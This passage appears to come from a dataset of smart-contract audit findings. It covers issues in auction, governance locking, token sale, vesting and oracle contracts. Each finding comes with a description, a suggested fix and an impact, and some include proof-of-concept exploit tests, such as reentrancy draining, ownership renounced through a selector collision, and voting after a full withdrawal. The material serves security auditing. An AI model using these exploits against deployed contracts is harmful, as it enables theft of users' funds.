If Bob is still the highest bidder, he wins the auction and his bidAmount of 10 eth is added to the availableCollateral of the oldBidder.\\nIf there currently is more than 10 eth in the contract (ongoing auctions, bids that have not withdrawn), then the oldBidder can withdraw 10 eth. But this means that in the future a withdraw will fail due to this missing 10 eth.",Implement the require check from _cancelBid to _cancelAllBids.,"A malicious user can win an auction for free.\\nAdditionally, either the oldBidder or some other user in the future will suffer the loss.\\nIf this is repeated multiple times, it will drain the contract balance and all users will lose their locked collateral.","```\\n require(\\n bidder != l.highestBids[tokenId][round].bidder,\\n 'EnglishPeriodicAuction: Cannot cancel bid if highest bidder'\\n );\\n```\\n" +User Can Vote Even When They Have 0 Locked Mento (Edge Case),medium,"There exists an edge case where the user will be withdrawing his entire locked MENTO amount and even then will be able to vote , this is depicted by a PoC to make things clearer.\\nThe flow to receiving voting power can be understood in simple terms as follows ->\\nUsers locks his MENTO and chooses a delegate-> received veMENTO which gives them(delegatee) voting power (there's cliff and slope at play too)\\nThe veMENTO is not a standard ERC20 , it is depicted through ""lines"" , voting power declines ( ie. slope period) with time and with time you can withdraw more of your MENTO.\\nThe edge case where the user will be withdrawing his entire locked MENTO amount and even then will be able to vote is as follows ->\\n1.) User has locked his MENTO balance in the Locking.sol\\n2.) The owner of the contract ""stops"" the contract for some emergency reason.\\n4.) 
Since the contract is stopped , the `getAvailableForWithdraw` will return the entire locked amount of the user as withdrawable\\n```\\nfunction getAvailableForWithdraw(address account) public view returns (uint96) {\\n uint96 value = accounts[account].amount;\\n if (!stopped) {\\n uint32 currentBlock = getBlockNumber();\\n uint32 time = roundTimestamp(currentBlock);\\n uint96 bias = accounts[account].locked.actualValue(time, currentBlock);\\n value = value - (bias);\\n }\\n return value;\\n```\\n\\n5.) The user receives his entire locked amount in L101.\\n6.) The owner ""start()"" the contract again\\n7.) Since the user's veMENTO power was not effected by the above flow , there still exists veMENTO a.k.a voting power to the delegate, and the user's delegate is still able to vote on proposals (even when the user has withdrew everything).\\nPOC\\nImport console log first in the file , paste this test in the `GovernanceIntegration.t.sol`\\n```\\nfunction test_Poc_Stop() public {\\n\\n vm.prank(governanceTimelockAddress);\\n mentoToken.transfer(alice, 10_000e18);\\n\\n vm.prank(governanceTimelockAddress);\\n mentoToken.transfer(bob, 10_000e18);\\n\\n vm.prank(alice);\\n locking.lock(alice, alice, 10_000e18, 1, 103);\\n\\n vm.prank(bob);\\n locking.lock(bob, bob, 1500e18, 1, 103);\\n\\n vm.timeTravel(BLOCKS_DAY);\\n\\n uint256 newVotingDelay = BLOCKS_DAY;\\n uint256 newVotingPeriod = 2 * BLOCKS_WEEK;\\n uint256 newThreshold = 5000e18;\\n uint256 newQuorum = 10; //10%\\n uint256 newMinDelay = 3 days;\\n uint32 newMinCliff = 6;\\n uint32 newMinSlope = 12;\\n\\n vm.prank(alice);\\n (\\n uint256 proposalId,\\n address[] memory targets,\\n uint256[] memory values,\\n bytes[] memory calldatas,\\n string memory description\\n ) = Proposals._proposeChangeSettings(\\n mentoGovernor,\\n governanceTimelock,\\n locking,\\n newVotingDelay,\\n newVotingPeriod,\\n newThreshold,\\n newQuorum,\\n newMinDelay,\\n newMinCliff,\\n newMinSlope\\n );\\n\\n // ~10 mins\\n 
    vm.timeTravel(120);\\n\\n    \\n\\n    vm.startPrank(governanceTimelockAddress);\\n    locking.stop();\\n    vm.stopPrank();\\n\\n    uint bal2 = mentoToken.balanceOf(alice);\\n    console.log(bal2);\\n\\n    vm.startPrank(alice);\\n    locking.withdraw();\\n    vm.stopPrank();\\n\\n    vm.startPrank(governanceTimelockAddress);\\n    locking.start();\\n    vm.stopPrank();\\n\\n    uint bal = mentoToken.balanceOf(alice);\\n    console.log(bal);\\n    vm.prank(alice);\\n    \\n\\n    console.log(mentoGovernor.castVote(proposalId, 1));\\n  }\\n```\\n\\nYou can see that Alice withdrew her entire locked amount and still was able to cast her vote.
The `placeBid` function calls the `_placeBid` internal function in `EnglishPeriodicAuctionInternal.sol` which calculates the `totalCollateralAmount` as follows :\\n```\\nuint256 totalCollateralAmount = bid.collateralAmount + collateralAmount;\\n```\\n\\nHere, `bid.collateralAmount` is the cumulative collateral deposited by the bidder in previous bids during the current auction round(i.e, zero if no bids were placed), and `collateralAmount` is the collateral to be deposited to place the bid. However the `_placeBid` function requires that `totalCollateralAmount` is strictly greater than `bidAmount` if the bidder is not the current owner of the Stewardship License. This check fails when the `feeAmount` is zero and this causes a Denial of Service to users trying to place a bid. Even if the users try to bypass this by depositing a value slightly larger than `bidAmount`, the `_checkBidAmount` function would still revert with `'Incorrect bid amount'`\\nPOC\\nThe following test demonstrates the above-mentioned scenario :\\n```\\n describe('exploit', function () {\\n it('POC', async function () {\\n // Auction start: Now + 100\\n // Auction end: Now + 400\\n const instance = await getInstance({\\n auctionLengthSeconds: 300,\\n initialPeriodStartTime: (await time.latest()) + 100,\\n licensePeriod: 1000,\\n });\\n const licenseMock = await ethers.getContractAt(\\n 'NativeStewardLicenseMock',\\n instance.address,\\n );\\n\\n // Mint token manually\\n const steward = bidder2.address;\\n await licenseMock.mintToken(steward, 0);\\n\\n // Start auction\\n await time.increase(300);\\n \\n const bidAmount = ethers.utils.parseEther('1.0');\\n const feeAmount = await instance.calculateFeeFromBid(bidAmount);\\n const collateralAmount = feeAmount.add(bidAmount);\\n\\n // Reverts when a user tries to place a bid\\n await expect( instance\\n .connect(bidder1)\\n .placeBid(0, bidAmount, { value: collateralAmount })).to.be.revertedWith('EnglishPeriodicAuction: Collateral must be greater 
than current bid');\\n\\n \\n \\n const extraAmt = ethers.utils.parseEther('0.1');\\n const collateralAmount1 = feeAmount.add(bidAmount).add(extraAmt);\\n \\n // Also reverts when the user tries to deposit collateral slighty greater than bid amount\\n await expect( instance\\n .connect(bidder1)\\n .placeBid(0, bidAmount, { value: collateralAmount1 })).to.be.revertedWith('EnglishPeriodicAuction: Incorrect bid amount'); \\n \\n // Only accepts a bid from the current steward\\n \\n await expect( instance\\n .connect(bidder2)\\n .placeBid(0, bidAmount, { value: 0 })).to.not.be.reverted;\\n\\n });\\n });\\n```\\n\\nTo run the test, copy the code above to `EnglishPeriodicAuction.ts` and alter L#68 as follows :\\n```\\n// Remove the line below\\n [await owner.getAddress(), licensePeriod, 1, 10],\\n// Add the line below\\n [await owner.getAddress(), licensePeriod, 0, 10],\\n```\\n\\nRun `yarn run hardhat test --grep 'POC'`","Alter EnglishPeriodicAuctionInternal.sol::L#330 as follows :\\n```\\n// Remove the line below\\n totalCollateralAmount > bidAmount,\\n// Add the line below\\n totalCollateralAmount >= bidAmount, \\n```\\n",The protocol becomes dysfunctional in such a scenario as users as DOS'd from placing a bid.,```\\nuint256 totalCollateralAmount = bid.collateralAmount + collateralAmount;\\n```\\n +Currently auctioned NFTs can be transferred to a different address in a specific edge case,medium,"Currently auctioned NFTs can be transferred to a different address in a specific edge case, leading to theft of funds.\\nThe protocol assumes that an NFT cannot change owner while it's being auctioned, this is generally the case but there is an exception, an NFT can change owner via mintToken() while an auction is ongoing when all the following conditions apply:\\nAn NFT is added `to` the collection without being minted (ie. 
`to` set `to` address(0)).\\nThe NFT is added `to` the collection with the parameter `tokenInitialPeriodStartTime[]` set `to` a timestamp lower than `l.initialPeriodStartTime` but bigger than 0(ie. `0` < `tokenInitialPeriodStartTime[]` < l.initialPeriodStartTime).\\nThe current `block.timestamp` is in-between `tokenInitialPeriodStartTime[]` and `l.initialPeriodStartTime`.\\nA malicious `initialBidder` can take advantage of this by:\\nBidding on the new added NFT via placeBid().\\nCalling mintToken() to transfer the NFT to a different address he controls.\\nClosing the auction via closeAuction()\\nAt point `3.`, because the NFT owner changed, the winning bidder (ie. initialBidder) is not the current NFT owner anymore. This will trigger the following line of code:\\n```\\nl.availableCollateral[oldBidder] += l.highestBids[tokenId][currentAuctionRound].bidAmount;\\n```\\n\\nWhich increases the `availableCollateral` of the `oldBidder` (ie. the address that owns the NFT after point 2.) by `bidAmount` of the highest bid. But because at the moment the highest bid was placed `initialBidder` was also the NFT owner, he only needed to transfer the `ETH` fee to the protocol instead of the whole bid amount.\\nThe `initialBidder` is now able to extract ETH from the protocol via the address used in point `2.` by calling withdrawCollateral() while also retaining the NFT license.",Don't allow `tokenInitialPeriodStartTime[]` to be set at a timestamp beforel.initialPeriodStartTime.,"Malicious initial bidder can potentially steal ETH from the protocol in an edge case. 
If the `ADD_TOKEN_TO_COLLECTION_ROLE` is also malicious, it's possible to drain the protocol.",```\\nl.availableCollateral[oldBidder] += l.highestBids[tokenId][currentAuctionRound].bidAmount;\\n```\\n +Tax refund is calculated based on the wrong amount,high,"Tax refund is calculated based on the wrong amount\\nAfter the private period has finished, users can claim a tax refund, based on their max tax free allocation.\\n```\\n (s.share, left) = _claim(s);\\n require(left > 0, ""TokenSale: Nothing to claim"");\\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE;\\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n```\\n\\nThe problem is that in case `s.share > taxFreeAllc`, the tax refund is calculated wrongfully. Not only it should refund the tax on the unused USDC amount, but it should also refund the tax for the tax-free allocation the user has.\\nImagine the following.\\nUser deposits 1000 USDC.\\nPrivate period finishes, token oversells. Only half of the user's money actually go towards the sell (s.share = 500 USDC, s.left = 500 USDC)\\nThe user has 400 USDC tax-free allocation\\nThe user must be refunded the tax for the 500 unused USDC, as well as their 400 USDC tax-free allocation. In stead, they're only refunded for the 500 unused USDC. 
(note, if the user had 500 tax-free allocation, they would've been refunded all tax)",change the code to the following:\\n```\\n refundTaxAmount = ((left + taxFreeAllc) * tax) / POINT_BASE;\\n```\\n,Users are not refunded enough tax,"```\\n (s.share, left) = _claim(s);\\n require(left > 0, ""TokenSale: Nothing to claim"");\\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE;\\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n```\\n" +"Vesting contract cannot work with ETH, although it's supposed to.",medium,"Vesting contract cannot work with native token, although it's supposed to.\\nWithin the claim function, we can see that if `token` is set to address(1), the contract should operate with ETH\\n```\\n function claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, ""No Deposit"");\\n require(s.index != vestingPoints.length, ""already claimed"");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(""""); // @audit - here\\n require(sent, ""Failed to send BNB to receiver"");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n\\nHowever, it is actually impossible for the contract to operate with ETH, since `updateUserDeposit` always attempts to do a token transfer.\\n```\\n function updateUserDeposit(\\n address[] memory 
_users,\\n uint256[] memory _amount\\n ) public onlyRole(DEFAULT_ADMIN_ROLE) {\\n require(_users.length <= 250, ""array length should be less than 250"");\\n require(_users.length == _amount.length, ""array length should match"");\\n uint256 amount;\\n for (uint256 i = 0; i < _users.length; i++) {\\n userdetails[_users[i]].userDeposit = _amount[i];\\n amount += _amount[i];\\n }\\n token.safeTransferFrom(distributionWallet, address(this), amount); // @audit - this will revert\\n }\\n```\\n\\nSince when the contract is supposed to work with ETH, token is set to address(1), calling `safeTransferFrom` on that address will always revert, thus making it impossible to call this function.","make the following check\\n```\\n if (address(token) != address(1)) token.safeTransferFrom(distributionWallet, address(this), amount);\\n```\\n",Vesting contract is unusable with ETH,"```\\n function claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, ""No Deposit"");\\n require(s.index != vestingPoints.length, ""already claimed"");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(""""); // @audit - here\\n require(sent, ""Failed to send BNB to receiver"");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n" +"If token does not oversell, users cannot claim tax refund on their tax free allocation.",high,"Users may not be able to claim tax refund\\nWithin TokenSale, upon depositing users, users have to pay tax. 
Then, users can receive a tax-free allocation - meaning they'll be refunded the tax they've paid on part of their deposit.\\nThe problem is that due to a unnecessary require check, users cannot claim their tax refund, unless the token has oversold.\\n```\\n function claim() external {\\n checkingEpoch();\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n ""TokenSale: Not time or not allowed""\\n );\\n\\n Staked storage s = stakes[msg.sender];\\n require(s.amount != 0, ""TokenSale: No Deposit""); \\n require(!s.claimed, ""TokenSale: Already Claimed"");\\n\\n uint256 left;\\n (s.share, left) = _claim(s);\\n require(left > 0, ""TokenSale: Nothing to claim""); // @audit - problematic line \\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE; // tax refund is on the wrong amount \\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n s.claimed = true;\\n usdc.safeTransfer(msg.sender, left);\\n emit Claim(msg.sender, left);\\n }\\n```\\n\\n```\\n function _claim(Staked memory _s) internal view returns (uint120, uint256) {\\n uint256 left;\\n if (state.totalPrivateSold > (state.totalSupplyInValue)) {\\n uint256 rate = (state.totalSupplyInValue * PCT_BASE) /\\n state.totalPrivateSold;\\n _s.share = uint120((uint256(_s.amount) * rate) / PCT_BASE);\\n left = uint256(_s.amount) - uint256(_s.share);\\n } else {\\n _s.share = uint120(_s.amount);\\n }\\n\\n return (_s.share, left);\\n }\\n```\\n\\n`left` only has value if the token has oversold. 
Meaning that even if the user has an infinite tax free allocation, if the token has not oversold, they won't be able to claim a tax refund.",Remove the require check,loss of funds,"```\\n function claim() external {\\n checkingEpoch();\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n ""TokenSale: Not time or not allowed""\\n );\\n\\n Staked storage s = stakes[msg.sender];\\n require(s.amount != 0, ""TokenSale: No Deposit""); \\n require(!s.claimed, ""TokenSale: Already Claimed"");\\n\\n uint256 left;\\n (s.share, left) = _claim(s);\\n require(left > 0, ""TokenSale: Nothing to claim""); // @audit - problematic line \\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE; // tax refund is on the wrong amount \\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n s.claimed = true;\\n usdc.safeTransfer(msg.sender, left);\\n emit Claim(msg.sender, left);\\n }\\n```\\n" +Reentrancy in Vesting.sol:claim() will allow users to drain the contract due to executing .call() on user's address before setting s.index = uint128(i),high,"Reentrancy in Vesting.sol:claim() will allow users to drain the contract due to executing .call() on user's address before setting s.index = uint128(I)\\nHere is the Vesting.sol:claim() function:\\n```\\nfunction claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, ""No Deposit"");\\n require(s.index != vestingPoints.length, ""already claimed"");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n 
}\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}("""");\\n require(sent, ""Failed to send BNB to receiver"");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n\\nFrom the above, You'll notice the claim() function checks if the caller already claimed by checking if the s.index has already been set to vestingPoints.length. You'll also notice the claim() function executes .call() and transfer the amount to the caller before setting the s.index = uint128(i), thereby allowing reentrancy.\\nLet's consider this sample scenario:\\nAn attacker contract(alice) has some native pctAmount to claim and calls `claim()`.\\n""already claimed"" check will pass since it's the first time she's calling `claim()` so her s.index hasn't been set\\nHowever before updating Alice s.index, the Vesting contract performs external .call() to Alice with the amount sent as well\\nAlice reenters `claim()` again on receive of the amount\\nbypass index ""already claimed"" check since this hasn't been updated yet\\ncontract performs external .call() to Alice with the amount sent as well again,\\nSame thing happens again\\nAlice ends up draining the Vesting contract","Here is the recommended fix:\\n```\\nif (pctAmount != 0) {\\n// Add the line below\\n s.index = uint128(i);\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}("""");\\n require(sent, ""Failed to send BNB to receiver"");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n// Remove the line below\\n s.index = uint128(i);\\n s.amountClaimed // Add the line below\\n= pctAmount;\\n }\\n```\\n\\nI'll also recommend using reentrancyGuard.",Reentrancy in Vesting.sol:claim() will allow users to drain the contract,"```\\nfunction claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = 
userdetails[sender];\\n require(s.userDeposit != 0, ""No Deposit"");\\n require(s.index != vestingPoints.length, ""already claimed"");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}("""");\\n require(sent, ""Failed to send BNB to receiver"");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n" +Blocklisted investors can still claim USDC in `TokenSale.sol`,medium,"A wrong argument is passed when checking if a user is blacklisted for claiming in `TokenSale.claim()`. Because the check is insufficient, blocked users can claim their USDC.\\n`Admin.setClaimBlock()` blocks users from claiming. The function accepts the address of the user to be blocked and adds it to the `blockClaim` mapping.\\n```\\n /**\\n @dev Whitelist users\\n @param _address Address of User\\n */\\n function setClaimBlock(address _address) external onlyRole(OPERATOR) {\\n blockClaim[_address] = true;\\n }\\n```\\n\\nThe check in `Admin.claim()` wrongly passes `address(this)` as argument when calling `Admin.blockClaim`.\\n```\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n ""TokenSale: Not time or not allowed""\\n );\\n```\\n\\nIn this context, `address(this)` will be the address of the token sale contract and the require statement can be bypassed even by a blocked user.","Pass the address of the user.\\n```\\n require(\\n// Remove the line below\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n// Add the line below\\n uint8(epoch) > 1 && !admin.blockClaim(msg.sender)),\\n ""TokenSale: Not time or not allowed""\\n );\\n```\\n",The whole functionality for blocking claims 
doesn't work properly.,```\\n /**\\n @dev Whitelist users\\n @param _address Address of User\\n */\\n function setClaimBlock(address _address) external onlyRole(OPERATOR) {\\n blockClaim[_address] = true;\\n }\\n```\\n +Max allocations can be bypassed with multiple addresses because of guaranteed allocations,medium,"`TokenSale._processPrivate()` ensures that a user cannot deposit more than their allocation amount. However, each address can deposit up to at least `maxAllocations`. This can be leveraged by a malicious user by using different addresses to claim all tokens without even staking.\\nThe idea of the protocol is to give everyone the right to have at least `maxAlocations` allocations. By completing missions, users level up and unlock new tiers. This process will be increasing their allocations. The problem is that when a user has no allocations, they have still a granted amount of `maxAllocations`.\\n`TokenSale.calculateMaxAllocation` returns $max(maxTierAlloc(), maxAllocation)$\\nFor a user with no allocations, `_maxTierAlloc()` will return 0. The final result will be that this user have `maxAllocation` allocations (because `maxAllocation` > 0).\\n```\\n if (userTier == 0 && giftedTierAllc == 0) {\\n return 0;\\n }\\n```\\n\\nMultiple Ethereum accounts can be used by the same party to take control over the IDO and all its allocations, on top of that without even staking.\\nNOTE: setting `maxAllocation = 0` is not a solution in this case because the protocol wants to still give some allocations to their users.",A possible solution may be to modify `calculateMaxAllocation` in the following way:\\n```\\n function calculateMaxAllocation(address _sender) public returns (uint256) {\\n uint256 userMaxAllc = _maxTierAllc(_sender);\\n// Add the line below\\n if (userMaxAllc == 0) return 0;\\n\\n if (userMaxAllc > maxAllocation) {\\n return userMaxAllc;\\n } else {\\n return maxAllocation;\\n }\\n }\\n```\\n,Buying all allocations without staking. 
This also violates a key property that only ION holders can deposit.,```\\n if (userTier == 0 && giftedTierAllc == 0) {\\n return 0;\\n }\\n```\\n +Potential damages due to incorrect implementation of the ````ZIP```` algorithm,medium,"`WooracleV2_2.fallback()` is used to post zipped token price and state data to the contract for sake of gas saving. However, the first 4 bytes of zipped data are not reserved to distinguish the `ZIP` call and other normal call's function selector. This would cause `ZIP` calls to be accidentally interpreted as any other functions in the contract, result in unintended exceptions and potential damages.\\nAccording solidity's official doc, there are two forms of `fallback()` function `with` or `without` parameter\\n```\\nfallback () external [payable];\\nfallback (bytes calldata _input) external [payable] returns (bytes memory _output);\\n```\\n\\nIf the version with parameters is used, _input will contain the full data sent to the contract (equal to msg.data)\\nAs the `_input` data is equal to `msg.data`, the solidity compiler would firstly check if first 4 bytes matches any normal function selectors, and would only execute `fallback(_input)` while no matching. Therefore, in zipped data, the first 4 bytes must be set to some reserved function selector, such as `0x00000000`, with no collision to normal function selectors. 
And the real zipped data then starts from 5th byte.\\nThe following coded PoC shows cases that the zipped data is accidentally interpreted as:\\nfunction renounceOwnership(); function setStaleDuration(uint256); function postPrice(address,uint128); function syncTS(uint256);\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {Test} from ""../../lib/forge-std/src/Test.sol"";\\nimport {console2} from ""../../lib/forge-std/src/console2.sol"";\\nimport {WooracleV2_2} from ""../../contracts/wooracle/WooracleV2_2.sol"";\\n\\ncontract WooracleZipBugTest is Test {\\n WooracleV2_2 public oracle;\\n\\n function setUp() public {\\n oracle = new WooracleV2_2();\\n }\\n\\n function testNormalCase() public {\\n /* reference:\\n File: test\\typescript\\wooraclev2_zip_inherit.test.ts\\n 97: function _encode_woo_price() {\\n op = 0\\n len = 1\\n (base, p)\\n base: 6, woo token\\n price: 0.23020\\n 23020000 (decimal = 8)\\n */\\n uint8 base = 6;\\n bytes memory zip = _makeZipData({\\n op: 0,\\n length: 1,\\n leadingBytesOfBody: abi.encodePacked(base, uint32((2302 << 5) + 4))\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n address wooAddr = oracle.getBase(6);\\n (uint256 price, bool feasible) = oracle.price(wooAddr);\\n assertEq(price, 23020000);\\n assertTrue(feasible);\\n }\\n\\n function testCollisionWithRenounceOwnership() public {\\n // selector of ""renounceOwnership()"": ""0x715018a6""\\n bytes memory zip = _makeZipData({\\n op: 1,\\n length: 0x31,\\n leadingBytesOfBody: abi.encodePacked(hex""5018a6"")\\n });\\n assertEq(oracle.owner(), address(this));\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n assertEq(oracle.owner(), address(0));\\n }\\n\\n function testCollisionWithSetStaleDuration() public {\\n // selector of ""setStaleDuration(uint256)"": ""0x99235fd4""\\n bytes memory zip = _makeZipData({\\n op: 2,\\n length: 0x19,\\n leadingBytesOfBody: abi.encodePacked(hex""235fd4"")\\n 
});\\n assertEq(oracle.staleDuration(), 120); // default: 2 mins\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n uint256 expectedStaleDuration;\\n assembly {\\n expectedStaleDuration := mload(add(zip, 36))\\n }\\n assertEq(oracle.staleDuration(), expectedStaleDuration);\\n assertTrue(expectedStaleDuration != 120);\\n }\\n\\n function testCollisionWithPostPrice() public {\\n // selector of ""postPrice(address,uint128)"": ""0xd5bade07""\\n bytes memory addressAndPrice = abi.encode(address(0x1111), uint256(100));\\n bytes memory zip = _makeZipData({\\n op: 3,\\n length: 0x15,\\n leadingBytesOfBody: abi.encodePacked(hex""bade07"", addressAndPrice)\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n (uint256 price, bool feasible) = oracle.price(address(0x1111));\\n assertEq(price, 100);\\n assertTrue(feasible);\\n }\\n\\n function testCollisionWithSyncTS() public {\\n // selector of ""syncTS(uint256)"": ""4f1f1999""\\n uint256 timestamp = 12345678;\\n bytes memory zip = _makeZipData({\\n op: 1,\\n length: 0xf,\\n leadingBytesOfBody: abi.encodePacked(hex""1f1999"", timestamp)\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n assertEq(oracle.timestamp(), timestamp);\\n }\\n\\n function _makeZipData(\\n uint8 op,\\n uint8 length,\\n bytes memory leadingBytesOfBody\\n ) internal returns (bytes memory result) {\\n assertTrue(length < 2 ** 6);\\n assertTrue(op < 4);\\n bytes1 head = bytes1(uint8((op << 6) + (length & 0x3F)));\\n uint256 sizeOfItem = op == 0 || op == 2 ? 
5 : 13;\\n uint256 sizeOfHead = 1;\\n uint256 sizeOfBody = sizeOfItem * length;\\n assertTrue(sizeOfBody >= leadingBytesOfBody.length);\\n result = bytes.concat(head, leadingBytesOfBody, _makePseudoRandomBytes(sizeOfBody - leadingBytesOfBody.length));\\n assertEq(result.length, sizeOfHead + sizeOfBody);\\n }\\n\\n function _makePseudoRandomBytes(uint256 length) internal returns (bytes memory result) {\\n uint256 words = (length + 31) / 32;\\n result = new bytes(words * 32);\\n for (uint256 i; i < words; ++i) {\\n bytes32 rand = keccak256(abi.encode(block.timestamp + i));\\n assembly {\\n mstore(add(add(result, 32), mul(i, 32)), rand)\\n }\\n }\\n\\n assembly {\\n mstore(result, length) // change to required length\\n }\\n assertEq(length, result.length);\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-03-woofi-swap\\WooPoolV2> forge test --match-contract WooracleZipBugTest -vv\\n[⠢] Compiling// rest of codeNo files changed, compilation skipped\\n[⠆] Compiling// rest of code\\n\\nRunning 5 tests for test/foundry/WooracleZipBug.t.sol:WooracleZipBugTest\\n[PASS] testCollisionWithPostPrice() (gas: 48643)\\n[PASS] testCollisionWithRenounceOwnership() (gas: 21301)\\n[PASS] testCollisionWithSetStaleDuration() (gas: 18289)\\n[PASS] testCollisionWithSyncTS() (gas: 35302)\\n[PASS] testNormalCase() (gas: 48027)\\nTest result: ok. 
5 passed; 0 failed; 0 skipped; finished in 2.13ms\\n\\nRan 1 test suites: 5 tests passed, 0 failed, 0 skipped (5 total tests)\\n```\\n","```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/WooPoolV2/contracts/wooracle/WooracleV2_2.sol b/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\nindex 9e66c63..4a9138f 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\n@@ // Remove the line below\\n416,9 // Add the line below\\n416,10 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n */\\n\\n uint256 x = _input.length;\\n// Remove the line below\\n require(x > 0, ""WooracleV2_2: !calldata"");\\n// Add the line below\\n require(x > 4, ""WooracleV2_2: !calldata"");\\n// Add the line below\\n require(bytes4(_input[0:4]) == bytes4(hex""00000000""));\\n\\n// Remove the line below\\n uint8 firstByte = uint8(bytes1(_input[0]));\\n// Add the line below\\n uint8 firstByte = uint8(bytes1(_input[5]));\\n uint8 op = firstByte 6; // 11000000\\n uint8 len = firstByte & 0x3F; // 00111111\\n\\n@@ // Remove the line below\\n428,12 // Add the line below\\n429,12 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n uint128 p;\\n\\n for (uint256 i = 0; i < len; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n base = getBase(uint8(bytes1(_input[1 // Add the line below\\n i * 5:1 // Add the line below\\n i * 5 // Add the line below\\n 1])));\\n// Remove the line below\\n p = _decodePrice(uint32(bytes4(_input[1 // Add the line below\\n i * 5 // Add the line below\\n 1:1 // Add the line below\\n i * 5 // Add the line below\\n 5])));\\n// Add the line below\\n base = getBase(uint8(bytes1(_input[5 // Add the line below\\n i * 5:5 // Add the line below\\n i * 5 // Add the line below\\n 1])));\\n// Add the line below\\n p = 
